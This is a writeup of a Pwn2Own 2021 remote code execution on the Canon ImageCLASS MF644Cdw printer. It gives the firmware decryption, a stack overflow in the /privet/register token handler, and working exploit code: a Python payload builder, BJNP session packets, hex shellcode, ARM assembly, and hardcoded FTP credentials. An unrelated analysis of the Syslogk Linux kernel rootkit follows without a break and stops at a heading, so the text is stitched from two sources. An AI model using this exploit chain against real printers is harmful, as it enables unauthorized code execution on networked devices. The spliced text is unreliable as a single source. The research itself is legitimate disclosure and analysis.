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Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup


Pwn2Own Austin 2021 was announced in August 2021 and introduced new categories, including printers. Based on our previous experience with printers, we decided to go after one of the three models. Among those, the Canon ImageCLASS MF644Cdw seemed like the most interesting target: previous research was limited (mostly targeting Pixma inkjet printers). Based on this, we started analyzing the firmware before even having bought the printer.

Our team was composed of 3 members:

Note: This writeup is based on version 10.02 of the printer's firmware, the latest available at the time of Pwn2Own.

Firmware extraction and analysis

Downloading firmware

The Canon website is interesting: you cannot download the firmware for a particular model without having a serial number which matches that model. This, as you might guess, is particularly annoying when you want to download a firmware for a model you do not own. Two options came to our mind:

  • Finding a picture of the model in a review or listing,
  • Finding a serial number of the same model on Shodan.

Thankfully, the MFC644cdw was reviewed in details by PCmag, and one of the pictures contained the serial number of the printer used for the review. This allowed us to download a firmware from the Canon USA website. The version available online at the time on that website was 06.03.

Predicting firmware URLs

As a side note, once the serial number was obtained, we could download several version of the firmware, for different operating systems. For example, version 06.03 for macOS has the following filename: mac-mf644-a-fw-v0603-64.dmg and the associated download link is As the URL implies, this page asks for the serial number and redirects you to the actual firmware if the serial is valid. In that case:

Of course, the base64 encoded id in the first URL is interesting: once decoded, you get the (literal string) 95039232d, which in turn, is the hex representation of 40000627501, which is part of the actual firmware URL!

A few more examples led us to understand that the part of the URL with the single digit (/5/ in our case) is just the last digit of the next part of the URL's path (/0400006275/ in this example). We assume this is probably used for load balancing or another similar reason. Using this knowledge, we were able to download a lot of different firmware images for various models. We also found out that Canon pages for USA or Europe are not as current as the Japanese page which had version 09.01 at the time of writing.

However, all of them lag behind the reality: the latest firmware version was 10.02, which is actually retrieved by the printer's firmware update mechanism. gives us the actual up-to-date version.

Firmware types

A small note about firmware "types". The update XML has 3 different entries per content kind:

  <content kind="bootable" value="1" deliveryCount="1" version="1003" base_url="" >
    <query arg="id" value="OTUwMzZkMDQ5" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  <content kind="bootable" value="2" deliveryCount="1" version="1003" base_url="" >
    <query arg="id" value="OTUwMzZkMGFk" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />
  <content kind="bootable" value="3" deliveryCount="1" version="1003" base_url="" >
    <query arg="id" value="OTUwMzZkMTEx" />
    <query arg="cmp" value="Z03" />
    <query arg="lang" value="JA" />

Which correspond to:

  • gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEA_V10.02.bin
  • gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEB_V10.02.bin
  • gdl_MF640C_740C_LBP620C_660C_Series_MainController_TYPEC_V10.02.bin

Each type corresponds to one of the models listed in the XML URL:

  • MF640C => TYPEA
  • MF740C => TYPEB
  • LBP620C => TYPEC

Decryption: black box attempts

Basic firmware extraction

Windows updates such as win-mf644-a-fw-v0603.exe are Zip SFX files, which contain the actual updater: mf644c_v0603_typea_w.exe. This is the end of the PE file as seen in Hiew:

004767F0:  58 50 41 44-44 49 4E 47-50 41 44 44-49 4E 47 58  XPADDINGPADDINGX
00072C00:  4E 43 46 57-00 00 00 00-3D 31 5D 08-20 00 00 00  NCFW    =1]

As you can see (the address changes from RVA to physical offset), the firmware update seems to be stored at the end of the PE as an overlay, and conveniently starts with a NCFW magic header. MacOS firmware updates can be extracted with 7z and contain a big file: which is almost the same as the Windows overlay except for the PE signature, and some offsets.

After looking at a bunch of firmware, it became clear that the footer of the update contains information about various parts of the firmware update, including a nice USTINFO.TXT file which describes the target model, etc. The NCFW magic also appears several times in the biggest "file" described by the UST footer. After some trial and error, its format was understood and allowed us to split the firmware into its basic components.

All this information was compiled into the script.

Weak encryption, but how weak?

The main firmware file Bootable.bin.sig is encrypted, but it seems encrypted with a very simple algorithm, as we can determine by looking at the patterns:

00000040  20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F  !"#$%&'()*+,-./
00000050  30 31 32 33 34 35 36 37 38 39 3A 3B 39 FC E8 7A 0123456789:;9..z
00000060  34 35 4F 50 44 45 46 37 48 49 CA 4B 4D 4E 4F 50 45OPDEF7HI.KMNOP
00000070  51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 QRSTUVWXYZ[\]^_`

The usual assumption of having big chunks of 00 or FF in the plaintext firmware allows us to have different hypothesis about the potential encryption algorithm. The increasing numbers most probably imply some sort of byte counter. We then tried to combine it with some basic operations and tried to decrypt:

  • A xor with a byte counter => fail
  • A xor with counter and feedback => fail

Attempting to use a known plaintext (where the plaintext is not 00 or FF) was impossible at this stage as we did not have a decrypted firmware image yet. Having a reverser in the team, the obvious next step was to try to find code which implements the decryption:

  • The updater tool does not decrypt the firmware but sends it as-is => fail
  • Check the firmware of previous models to try to find unencrypted code which supports encrypted "NCFW" updates:
    • FAIL
    • However, we found unencrypted firmware files with a similar structure which gave use a bit of known plaintext, but did not give any real clue about the solution

Hardware: first look

Main board and serial port

Once we received the printer, we of course started dismantling it to look for interesting hardware features and ways to help us get access to the firmware.

  • Looking at the hardware we considered these different approaches to obtain more information:
  • An SPI is present on the mainboard, read it
  • An Unsolder eMMC is present on the mainboard, read it
  • Find an older model, with unencrypted firmware and simpler flash to unsolder, read, profit. Fortunately, we did not have to go further in this direction.
  • Some printers are known to have a serial port for debug providing a mini shell. Find one and use it to run debug commands in order to get plaintext/memory dump (NOTE of course we found the serial port afterwards)

Service mode

All enterprise printers have a service mode, intended for technicians to diagnose potential problems. YouTube is a good source of info on how to enter it. On this model, the dance is a bit weird as one must press "invisible" buttons. Once in service mode, debug logs can be dumped on a USB stick, which creates several files:

  • SUBLOG.BIN is obviously SUBLOG.TXT, encrypted with an algorithm which exhibits the same patterns as the encrypted firmware.

Decrypting firmware

Program synthesis approach

At this point, this was our train of thought:

  • The encryption algorithm seemed "trivial" (lots of patterns, byte by byte)
  • SUBLOG.TXT gave us lots of plaintext
  • We were too lazy to find it by blackbox/reasoning

As program synthesis has evolved quite fast in the past years, we decided to try to get a tool to synthesize the decryption algorithm for us. We of course used the known plaintext from SUBLOG.TXT, which can be used as constraints. Rosette seemed easy to use and well suited, so we went with that. We started following a nice tutorial which worked over the integers, but gave us a bit of a headache when trying to directly convert it to bitvectors.

However, we quickly realized that we didn't have to synthesize a program (for all inputs), but actually solve an equation where the unknown was the program which would satisfy all the constraints built using the known plaintext/ciphertext pairs. The "Essential" guide to Rosette covers this in an example for us. So we started by defining the "program" grammar and crypt function, which defines a program using the grammar, with two operands, up to 3 layers deep:

(define int8? (bitvector 8))
(define (int8 i)
  (bv i int8?))

(define-grammar (fast-int8 x y)  ; Grammar of int32 expressions over two inputs:
   (choose x y (?? int8?)        ; <expr> := x | y | <32-bit integer constant> |
           ((bop) (expr) (expr))  ;           (<bop> <expr> <expr>) |
           ((uop) (expr)))]       ;           (<uop> <expr>)
   (choose bvadd bvsub bvand      ; <bop>  := bvadd  | bvsub | bvand |
           bvor bvxor bvshl       ;           bvor   | bvxor | bvshl |
           bvlshr bvashr)]        ;           bvlshr | bvashr
   (choose bvneg bvnot)])         ; <uop>  := bvneg | bvnot

(define (crypt x i)
  (fast-int8 x i #:depth 3))

Once this is done, we can define the constraints, based on the known plain/encrypted pairs and their position (byte counter i). And then we ask Rosette for an instance of the crypt program which satisfies the constraints:

(define sol (solve
; removing constraints speed things up
    (&& (bveq (crypt (int8 #x62) (int8 0)) (int8 #x3d))
; [...]        
        (bveq (crypt (int8 #x69) (int8 7)) (int8 #x3d))
        (bveq (crypt (int8 #x06) (int8 #x16)) (int8 #x20))
        (bveq (crypt (int8 #x5e) (int8 #x17)) (int8 #x73))
        (bveq (crypt (int8 #x5e) (int8 #x18)) (int8 #x75))
        (bveq (crypt (int8 #xe8) (int8 #x19)) (int8 #x62))
; [...]        
        (bveq (crypt (int8 #xc3) (int8 #xe0)) (int8 #x3a))
        (bveq (crypt (int8 #xef) (int8 #xff)) (int8 #x20))

(print-forms sol)

After running racket rosette.rkt and waiting for a few minutes, we get the following output:

(list 'define '(crypt x i)
  (list 'bvlshr '(bvsub i x) (list 'bvadd (bv #x87 8) (bv #x80 8)))
  '(bvsub (bvadd i i) (bvadd x x))))

which is a valid decryption program ! But it's a bit untidy. So let's convert it to C, with a trivial simplification:

uint8_t crypt(uint8_t i, uint8_t x) {
    uint8_t t = i-x;
    return (((2*t)&0xFF)|((t>>((0x87+0x80)&0xFF))&0xFF))&0xFF;

and compile it with gcc -m32 -O2 using to get the optimized version:

mov     al, byte ptr [esp+4]
sub     al, byte ptr [esp+8]
rol     al

So our encryption algorithm was a trivial ror(x-i, 1)!

Exploiting setup

After we decrypted the firmware and noticed the serial port, we decided to set up an environment that would facilitate our exploitation of the vulnerability.

We set up a Raspberry Pi on the same network as the printer that we also connected to the serial port of the printer. In this way we could remotely exploit the vulnerability while controlling the status of the printer via many features offered by the serial port.

Serial port: dry shell

The serial port gave us access to the aforementioned dry shell which provided incredible help to understand / control the printer status and debug it during our exploitation attempts.

Among the many powerful features offered, here are the most useful ones:

  • The ability to perform a full memory dump: a simple and quick way to retrieve the updated firmware unencrypted.
  • The ability to perform basic filesystem operations.
  • The ability to list the running tasks and their associated memory segments.

  • The ability to start an FTP daemon, this will come handy later.

  • The ability to inspect the content of memory at a specific address.

This feature was used a lot to understand what was going on during exploitation attempts. One of the annoying things is the presence of a watchdog which restarts the whole printer if the HTTP daemon crashes. We had to run this command quickly after any exploitation attempts.


Attack surface

The Pwn2Own rules state that if there's authentication, it should be bypassed. Thus, the easiest way to win is to find a vulnerability in a non authenticated feature. This includes obvious things like:

  • Printing functions and protocols,
  • Various web pages,
  • The HTTP server,
  • The SNMP server.

We started by enumerating the "regular" web pages that are handled by the web server (by checking the registered pages in the code), including the weird /elf/ subpages. We then realized some other URLs were available in the firmware, which were not obviously handled by the usual code: /privet/, which are used for cloud based printing.

Vulnerable function

Reverse engineering the firmware is rather straightforward, even if the binary is big. The CPU is standard ARMv7. By reversing the handlers, we quickly found the following function. Note that all names were added manually, either taken from debug logging strings or after reversing:

int __fastcall ntpv_isXPrivetTokenValid(char *token)
  int tklen; // r0
  char *colon; // r1
  char *v4; // r1
  int timestamp; // r4
  int v7; // r2
  int v8; // r3
  int lvl; // r1
  int time_delta; // r0
  const char *msg; // r2
  char buffer[256]; // [sp+4h] [bp-174h] BYREF
  char str_to_hash[28]; // [sp+104h] [bp-74h] BYREF
  char sha1_res[24]; // [sp+120h] [bp-58h] BYREF
  int sha1_from_token[6]; // [sp+138h] [bp-40h] BYREF
  char last_part[12]; // [sp+150h] [bp-28h] BYREF
  int now; // [sp+15Ch] [bp-1Ch] BYREF
  int sha1len; // [sp+164h] [bp-14h] BYREF

  bzero(buffer, 0x100u);
  bzero(sha1_from_token, 0x18u);
  memset(last_part, 0, sizeof(last_part));
  bzero(str_to_hash, 0x1Cu);
  bzero(sha1_res, 0x18u);
  sha1len = 20;
  if ( ischeckXPrivetToken() )
    tklen = strlen(token);
    base64decode(token, tklen, buffer);
    colon = strtok(buffer, ":");
    if ( colon )
      strncpy(sha1_from_token, colon, 20);
      v4 = strtok(0, ":");
      if ( v4 )
        strncpy(last_part, v4, 10);
    sprintf_0(str_to_hash, "%s%s%s", x_privet_secret, ":", last_part);
    if ( sha1(str_to_hash, 28, sha1_res, &sha1len) )
      sha1_res[20] = 0;
      if ( !strcmp_0((unsigned int)sha1_from_token, sha1_res, 0x14u) )
        timestamp = strtol2(last_part);
        time(&now, 0, v7, v8);
        lvl = 86400;
        time_delta = now - LODWORD(qword_470B80E0[0]) - timestamp;
        if ( time_delta <= 86400 )
          msg = "[NTPV] %s: x-privet-token is valid.\n";
          lvl = 5;
          msg = "[NTPV] %s: issue_timecounter is expired!!\n";
        if ( time_delta <= 86400 )
          log(3661, lvl, msg, "ntpv_isXPrivetTokenValid");
          return 1;
        log(3661, 5, msg, "ntpv_isXPrivetTokenValid");
        log(3661, 5, "[NTPV] %s: SHA1 hash value is invalid!!\n", "ntpv_isXPrivetTokenValid");
      log(3661, 3, "[NTPV] ERROR %s fail to generate hash string.\n", "ntpv_isXPrivetTokenValid");
    return 0;
  log(3661, 6, "[NTPV] %s() DEBUG MODE: Don't check X-Privet-Token.", "ntpv_isXPrivetTokenValid");
  return 1;

The vulnerable code is the following line:

base64decode(token, tklen, buffer);

With some thought, one can recognize the bug from the function signature itself -- there is no buffer length parameter passed in, meaning base64decode has no knowledge of buffer bounds. In this case, it decodes the base64-encoded value of the X-Privet-Token header into the local, stack based buffer which is 256 bytes long. The header is attacker-controlled is limited only by HTTP constraints, and as a result can be much larger. This leads to a textbook stack-based buffer overflow. The stack frame is relatively simple:

-00000178 var_178         DCD ?
-00000174 buffer          DCB 256 dup(?)
-00000074 str_to_hash     DCB 28 dup(?)
-00000058 sha1_res        DCB 20 dup(?)
-00000044 var_44          DCD ?
-00000040 sha1_from_token DCB 24 dup(?)
-00000028 last_part       DCB 12 dup(?)
-0000001C now             DCD ?
-00000018                 DCB ? ; undefined
-00000017                 DCB ? ; undefined
-00000016                 DCB ? ; undefined
-00000015                 DCB ? ; undefined
-00000014 sha1len         DCD ?
-00000010 ; end of stack variables

The buffer array is not really far from the stored return address, so exploitation should be relatively easy. Initially, we found the call to the vulnerable function in the /privet/printer/createjob URL handler, which is not accessible before authenticating, so we had to dig a bit more.

ntpv functions

The various ntpv URLs and handlers are nicely defined in two different arrays of structures as you can see below:

privet_url nptv_urls[8] =
  { 0, "/privet/info", "GET" },
  { 1, "/privet/register", "POST" },
  { 2, "/privet/accesstoken", "GET" },
  { 3, "/privet/capabilities", "GET" },
  { 4, "/privet/printer/createjob", "POST" },
  { 5, "/privet/printer/submitdoc", "POST" },
  { 6, "/privet/printer/jobstate", "GET" },
  { 7, NULL, NULL }
DATA:45C91C0C nptv_cmds       id_cmd <0, ntpv_procInfo>
DATA:45C91C0C                                         ; DATA XREF: ntpv_cgiMain+338↑o
DATA:45C91C0C                                         ; ntpv_cgiMain:ntpv_cmds↑o
DATA:45C91C0C                 id_cmd <1, ntpv_procRegister>
DATA:45C91C0C                 id_cmd <2, ntpv_procAccesstoken>
DATA:45C91C0C                 id_cmd <3, ntpv_procCapabilities>
DATA:45C91C0C                 id_cmd <4, ntpv_procCreatejob>
DATA:45C91C0C                 id_cmd <5, ntpv_procSubmitdoc>
DATA:45C91C0C                 id_cmd <6, ntpv_procJobstate>
DATA:45C91C0C                 id_cmd <7, 0>

After reading the documentation and reversing the code, it appeared that the register URL was accessible without authentication and called the vulnerable code.


Triggering the bug

Using a pattern generated with rsbkb, we were able to get the following crash on the serial port:

Dry> < Error Exception >
 CORE : 0
 TYPE : prefetch
 TASK ID   : 269
 TASK Name : AsC2
 R 0  : 00000000
 R 1  : 00000000
 R 2  : 40ec49fc
 R 3  : 49789eb4
 R 4  : 316f4130
 R 5  : 41326f41
 R 6  : 6f41336f
 R 7  : 49c1b38c
 R 8  : 49d0c958
 R 9  : 00000000
 R10  : 00000194
 R11  : 45c91bc8
 R12  : 00000000
 R13  : 4978a030
 R14  : 4167a1f4
 PC   : 356f4134
 PSR  : 60000013
 CTRL : 00c5187d

Which gives:

$ rsbkb bofpattoff 4Ao5
Offset: 434 (mod 20280) / 0x1b2

Astute readers will note that the offset is too big compared to the local stack frame size, which is only 0x178 bytes. Indeed, the correct offset for PC, from the start of the local buffer is 0x174. The 0x1B2 which we found using the buffer overflow pattern actually triggers a crash elsewhere and makes exploitation way harder. So remember to always check if your offsets make sense.

Buffer overflow

As the firmware is lacking protections such as stack cookies, NX, and ASLR, exploiting the buffer overflow should be rather straightforward, despite the printer running DRYOS which differs from usual operating systems. Using the information gathered while researching the vulnerability, we built the following class to exploit the vulnerability and overwrite the PC register with an arbitrary address:

import struct

class PrivetPayload:
    def __init__(self, ret_addr=0x1337):
        self.ret_addr = ret_addr

    def r4(self):
        return b"\x44\x44\x44\x44"

    def r5(self):
        return b"\x55\x55\x55\x55"

    def r6(self):
        return b"\x66\x66\x66\x66"

    def pc(self):
        return struct.pack("<I", self.ret_addr)

    def __bytes__(self):
        return (
            b":" * 0x160
            + struct.pack("<I", 0x20)  # pHashStrBufLen
            + self.r4
            + self.r5
            + self.r6
            + self.pc

The vulnerability can then be triggered with the following code, assuming the printer's IP address is

import base64
import http.client

payload = privet.PrivetPayload()
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(bytes(payload)),

conn = http.client.HTTPConnection("", 80)
conn.request("POST", "/privet/register", "", headers)

To confirm that the exploit was extremely reliable, we simply jumped to a debug function's entry point (which printed information to the serial console) and observed it worked consistently — though the printer rebooted afterwards because we hadn't cleaned the stack.

With this out of the way, we now need to work on writing a useful exploit. After reaching out to the organizers to learn more about their expectations regarding the proof of exploitation, we decided to show a custom image on the printer's LCD screen.

To do so, we could basically:

  • Store our exploit in the buffer used to trigger the overflow and jump into it,
  • Find another buffer we controlled and jump into it,
  • Rely only on return-oriented programming.

Though the first method would have been possible (we found a convenient add r3, r3, #0x103 ; bx r3 gadget), we were limited by the size of the buffer itself, even more so because parts of it were being rewritten in the function's body. Thus, we decided to look into the second option by checking other protocols supported by the printer.


One of the supported protocols is BJNP, which was conveniently exploited by Synacktiv ninjas on a different printer, accessible on UDP port 8611. This project adds a BJNP backend for CUPS, and the protocol itself is also handled by Wireshark.

In our case, BJNP is very useful: it can handle sessions and allows the client to store data (up to 0x180 bytes) on the printer for the duration of the session, which means we can precisely control until when our payload will remain available in memory. Moreover, this data is stored in the field of a global structure, which means it is always located at the same address for a given firmware. For the sake of our exploit, we reimplemented parts of the protocol using Scapy:

from scapy.packet import Packet
from scapy.fields import (

class BJNPPkt(Packet):
    name = "BJNP Packet"

        0x0: "Client",
        0x1: "Printer",
        0x2: "Scanner",

        0x000: "GetPortConfig",
        0x201: "GetNICInfo",
        0x202: "NICCmd",
        0x210: "SessionStart",
        0x211: "SessionEnd",
        0x212: "GetSessionInfo",
        0x220: "DataRead",
        0x221: "DataWrite",
        0x230: "GetDeviceID",
        0x232: "CmdNotify",
        0x240: "AppCmd",

        0x8200: "Invalid header",
        0x8300: "Session error",
        0x8502: "Session already exists",

    fields_desc = [
        StrFixedLenField("magic", default=b"MFNP", length=4),
        BitEnumField("device", default=0, size=1, enum=BJNP_DEVICE_ENUM),
        BitEnumField("cmd", default=0, size=15, enum=BJNP_COMMAND_ENUM),
        EnumField("err_no", default=0, enum=BJNP_ERROR_ENUM, fmt="!H"),
        ShortField("seq_no", default=0),
        ShortField("sess_id", default=0),
        FieldLenField("body_len", default=None, length_of="body", fmt="!I"),
        StrLenField("body", b"", length_from=lambda pkt: pkt.body_len),

For our version of the firmware, the BJNP structure is located at 0x46F2B294 and the session data sent by the client is stored at offset 0x24. We also want our payload to run in thumb mode to reduce its size, which means we need to jump to an odd address. All in all, we can simply overwrite the pc register with 0x46F2B294+0x24+1=0x46F2B2B9 in our original payload to reach the BJNP session buffer.

Initial PoC

Quick recap of the exploitation strategy:

  • Start a BJNP session and store our exploit in the session data,
  • Exploit the buffer overflow to jump in the session buffer,
  • Close the BJNP session to remove our exploit from memory once it ran.

To demonstrate this, we can jump to the function which disables the energy save mode on the printer (and wakes the screen up, which is useful to check if it actually worked). In our firmware, it is located at 0x413054D8, and we simply need to set the r0 register to 0 before calling it:

mov r0, #0
mov r12, #0x54D8
movt r12, #0x4130
blx r12

To avoid the printer rebooting, we can also fix the r0 and lr registers to restore the original flow:

mov r0, #0
mov r1, #0xEBA0
movt r1, #0x40DE
mov lr, r1
bx lr

Putting it all together, here is an exploit which does just that:

import time
import socket
import base64
import http.client

def store_payload(sock, payload):
    assert len(payload) <= 0x180, ValueError(
        "Payload too long: {} is greater than {}".format(len(payload), 0x180)

    pkt = BJNPPkt(
        body=(b"\x00" * 8 + payload + b"\x00" * (0x180 - len(payload))),

    res = BJNPPkt(sock.recv(4096))

    # The printer should return a valid session ID
    assert res.sess_id != 0, ValueError("Failed to create session")

def cleanup_payload(sock):
    pkt = BJNPPkt(

    res = BJNPPkt(sock.recv(4096))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("", 8610))

bjnp_payloads = bytes.fromhex("4FF0000045F2D84C44F2301CE0474FF000004EF6A031C4F2DE018E467047")
store_payload(sock, bjnp_payload)

privet_payload = privet.PrivetPayload(ret_addr=0x46F2B2B9)
headers = {
    "Content-type": "application/json",
    "Accept": "text/plain",
    "X-Privet-Token": base64.b64encode(bytes(privet_payload)),

conn = http.client.HTTPConnection("", 80)
conn.request("POST", "/privet/register", "", headers)




We can now build upon this PoC to create a meaningful payload. As we want to display a custom image on screen, we need to:

  • Find a way of uploading the image data (as we're limited to 0x180 bytes in total in the BJNP session buffer),
  • Make sure the screen is turned on (for example, by disabling the energy save mode as above),
  • Call the display function with our image data to show it on screen.

Displaying an image

As the firmware contains a number of debug functions, we were able to understand the display mechanism rather quickly. There is a function able to write an image into the frame buffer (located at 0x41305158 in our firmware) which takes two arguments: the address of an RGB image, and the address of a frame buffer structure which looks like below:

struct frame_buffer_struct {
    unsigned short x;
    unsigned short y;
    unsigned short width;
    unsigned short height;

The frame buffer can only be used to display 320x240 pixels at a time which isn't enough to cover the whole screen as it is 800x480 pixels. We push this structure on the stack with the following code:

sub sp, #8
mov r0, #320
strh r0, [sp, #4]  ; width
mov r0, #240
strh r0, [sp, #6]  ; height
mov r0, #0
strh r0, [sp]      ; x
strh r0, [sp, #2]  ; y

Once this is done, assuming r5 contains the address of our image buffer, we display it on screen with the following code:

; Display frame buffer
mov r1, r5         ; Image buffer
mov r0, sp         ; Frame buffer struct
mov r12, #0x5158
movt r12, #0x4130
blx r12

This leaves the question of the image buffer itself.


Though we thought of multiple options to upload the image, we ended up deciding to use a legitimate feature of the printer: it can serve as an FTP server, which is disabled by default. Thus, we need to:

  • Enable the ftpd service,
  • Upload our image from the client,
  • Read the image in a buffer.

In our firmware, the function to enable the ftpd service is located at 0x4185F664 and takes 4 arguments: the maximum number of simultaneous client, the timeout, the command port, and the data port. It can be enabled with the following payload:

mov r0, #0x3       ; Max clients
mov r1, #0x0       ; Timeout
mov r2, #21        ; Command port
mov r3, #20        ; Data port
mov r12, #0xF664
movt r12, #0x4185
blx r12

The ftpd service also has a feature to change directory. This doesn't really matter to us since the default directory is always S:/. We could however decide to change it to: either access data stored on other paths (e.g. the admin password) or to ensure our exploit works correctly even if the directory was somehow changed beforehand. To do so, we would need to call the function at 0x4185E2A4 with the r0 register set to the address of the new path string.

Once enabled, the FTP server requires credentials to connect. Fortunately for us, they are hardcoded in the firmware as guest / welcome.. We can upload our image (called a in this example) with the following code:

import ftplib

with ftplib.FTP(host="", user="guest", passwd="welcome.") as ftp:
    with open("image.raw") as f:
        ftp.storbinary("STOR a", f)

File system

We are simply left with reading the image from the filesystem. Thankfully, DRYOS has an abstraction layer to handle this, allowing us to only look for the equivalent of the usual open, read, and close functions. In our firmware, they are located respectively at 0x416917C8, 0x41691A20, and 0x41691878. Assuming r5 contains the address of our image path, we can open the file like so:

mov r2, #0x1C0
mov r1, #0
mov r0, r5         ; Image path
mov r12, #0x17C8
movt r12, #0x4169
blx r12
mov r5, r0         ; File handle

; Exit if there was an error opening the file
cmp r5, #0
ble .end

The image being too large to store on the stack, we could decide to dynamically allocate a buffer. However, the firmware contains debug images stored in writable memory, so we decided to overwrite one of them instead to simplify the exploit. We went with 0x436A3F64, which originally contains a screenshot of a calculator.

Here is the payload to read the content of the file into this buffer:

; Get address of image buffer
mov r10, #0x3F64
movt r10, #0x436A

; Compute image size
mov r2, #320       ; Width
mov r3, #240       ; Height
mov r6, #3         ; Depth
mul r6, r6, r2
mul r6, r6, r3

; Read content of file in buffer
mov r3, #0         ; Bytes read
mov r4, r6         ; Bytes left to read
mov r2, r4         ; Number of bytes to read
add r1, r10, r3    ; Buffer position
mov r0, r5         ; File handle
mov r12, #0x1A20
movt r12, #0x4169
blx r12
cmp r0, #0
ble .end_read      ; Exit in case of an error
add r3, r3, r0
sub r4, r4, r0
cmp r4, #0
bgt .loop

For completeness, here is how to close the file:

mov r0, r5
mov r12, #0x1878
movt r12, #0x4169
blx r12

Putting everything together

In the end, our exploit is split into 3 parts:

  1. Execute a first payload to enable the ftpd service and change to the S:/ directory,
  2. Upload our image using FTP,
  3. Exploit the vulnerability with another payload reading the image and displaying it on the screen.

You can find the script handling all this in the and you can see the exploit in action here.

It feels a bit... Anticlimactic? Where is the Doom port for DRYOS when you need it...


Canon published an advisory in March 2022 alongside a firmware update.

A quick look at this new version shows that the /privet endpoint is no longer reachable: the function registering this path now logs a message before simply exiting, and the /privet string no longer appears in the binary. Despite this, it seems like the vulnerable code itself is still there - though it is now supposedly unreachable. Strings related to FTP have also been removed, hinting that Canon may have disabled this feature as well.

As a side note, disabling this feature makes sense since Google Cloud Print was discontinued on December 31, 2020, and Canon announced they no longer supported it as of January 1, 2021.


In the end, we achieved a perfectly reliable exploit for our printer. It should be noted that our whole work was based on the European version of the printer, while the American version was used during the contest, so a bit of uncertainty still remained on the d-day. Fortunately, we had checked that the firmware of both versions matched beforehand.

We also adapted the offsets in our exploit to handle versions 9.01, 10.02, and 10.03 (released during the competition) in case the organizers' printer was updated. To do so, we built a script to automatically find the required offsets in the firmware and update our exploit.

All in all, we were able to remotely display an image of our choosing on the printer's LCD screen, which counted as a success and earned us 2 Master of Pwn points.

Linux Threat Hunting: ‘Syslogk’ a kernel rootkit found under development in the wild


Rootkits are dangerous pieces of malware. Once in place, they are usually really hard to detect. Their code is typically more challenging to write than other malware, so developers resort to code reuse from open source projects. As rootkits are very interesting to analyze, we are always looking out for these kinds of samples in the wild.

Adore-Ng is a relatively old, open-source, well-known kernel rootkit for Linux, which initially targeted kernel 2.x but is currently updated to target kernel 3.x. It enables hiding processes, files, and even the kernel module, making it harder to detect. It also allows authenticated user-mode processes to interact with the rootkit to control it, allowing the attacker to hide many custom malicious artifacts by using a single rootkit.

In early 2022, we were analyzing a rootkit mostly based on Adore-Ng that we found in the wild, apparently under development. After obtaining the sample, we examined the .modinfo section and noticed it is compiled for a specific kernel version.

As you may know, even if it is possible to ‘force load’ the module into the kernel by using the --force flag of the insmod Linux command, this operation can fail if the required symbols are not found in the kernel; this can often lead to a system crash.

insmod -f {module}

We discovered that the kernel module could be successfully loaded without forcing into a default Centos 6.10 distribution, as the rootkit we found is compiled for a similar kernel version.

While looking at the file’s strings, we quickly identified the PgSD93ql hardcoded file name in the kernel rootkit to reference the payload. This payload file name is likely used to make it less obvious for the sysadmin, for instance, it can look like a legitimate PostgreSQL file.

Using this hardcoded file name, we extracted the file hidden by the rootkit. It is a compiled backdoor trojan written in C programming language; Avast’s antivirus engine detects and classifies this file as ELF:Rekoob – which is widely known as the Rekoobe malware family. Rekoobe is a piece of code implanted in legitimate servers. In this case it is embedded in a fake SMTP server, which spawns a shell when it receives a specially crafted command. In this post, we refer to this rootkit as Syslogk rootkit, due to how it ‘reveals’ itself when specially crafted data is written to the file /proc/syslogk .

Analyzing the Syslogk rootkit

The Syslogk rootkit is heavily based on Adore-Ng but incorporates new functionalities making the user-mode application and the kernel rootkit hard to detect.

Loading the kernel module

To load the rootkit into kernel space, it is necessary to approximately match the kernel version used for compiling; it does not have to be strictly the same.

vermagic=2.6.32-696.23.1.el6.x86_64 SMP mod_unload modversions

For example, we were able to load the rootkit without any effort in a Centos 6.10 virtual machine by using the insmod Linux command.

After loading it, you will notice that the malicious driver does not appear in the list of loaded kernel modules when using the lsmod command.

Revealing the rootkit

The rootkit has a hide_module function which uses the list_del function of the kernel API to remove the module from the linked list of kernel modules. Next, it also accordingly updates its internal module_hidden flag.

Fortunately, the rootkit has a functionality implemented in the proc_write function that exposes an interface in the /proc file system which reveals the rootkit when the value 1 is written into the file /proc/syslogk.

Once the rootkit is revealed, it is possible to remove it from memory using the rmmod Linux command. The Files section of this post has additional details that will be useful for programmatically uncloaking the rootkit.

Overview of the Syslogk rootkit features

Apart from hiding itself, making itself harder to detect when implanted, Syslogk can completely hide the malicious payload by taking the following actions:

  • The hk_proc_readdir function of the rootkit hides directories containing malicious files, effectively hiding them from the operating system.
  • The malicious processes are hidden via hk_getpr – a mix of Adore-Ng functions for hiding processes.
  • The malicious payload is hidden from tools like Netstat; when running, it will not appear in the list of services. For this purpose, the rootkit uses the function hk_t4_seq_show.
  • The malicious payload is not continuously running. The attacker remotely executes it on demand when a specially crafted TCP packet (details below) is sent to the infected machine, which inspects the traffic by installing a netfilter hook.
  • It is also possible for the attacker to remotely stop the payload. This requires using a hardcoded key in the rootkit and knowledge of some fields of the magic packet used for remotely starting the payload. 

We observed that the Syslogk rootkit (and Rekoobe payload) perfectly align when used covertly in conjunction with a fake SMTP server. Consider how stealthy this could be; a backdoor that does not load until some magic packets are sent to the machine. When queried, it appears to be a legitimate service hidden in memory, hidden on disk, remotely ‘magically’ executed, hidden on the network. Even if it is found during a network port scan, it still seems to be a legitimate SMTP server.

For compromising the operating system and placing the mentioned hiding functions, Syslogk uses the already known set_addr_rw and set_addr_ro rootkit functions, which adds or removes writing permissions to the Page Table Entry (PTE) structure.

After adding writing permissions to the PTE, the rootkit can hook the functions declared in the hks internal rootkit structure.

PTE Hooks
Type of the function Offset Name of the function
Original hks+(0x38) * 0 proc_root_readdir
Hook hks+(0x38) * 0 + 0x10 hk_proc_readdir
Original hks+(0x38) * 1 tcp4_seq_show
Hook hks+(0x38) * 1 + 0x10 hk_t4_seq_show
Original hks+(0x38) * 2 sys_getpriority
Hook hks+(0x38) * 2 + 0x10 hk_getpr

The mechanism for placing the hooks consists of identifying the hookable kernel symbols via /proc/kallsyms as implemented in the get_symbol_address function of the rootkit (code reused from this repository). After getting the address of the symbol, the Syslogk rootkit uses the udis86 project for hooking the function.

Understanding the directory hiding mechanism

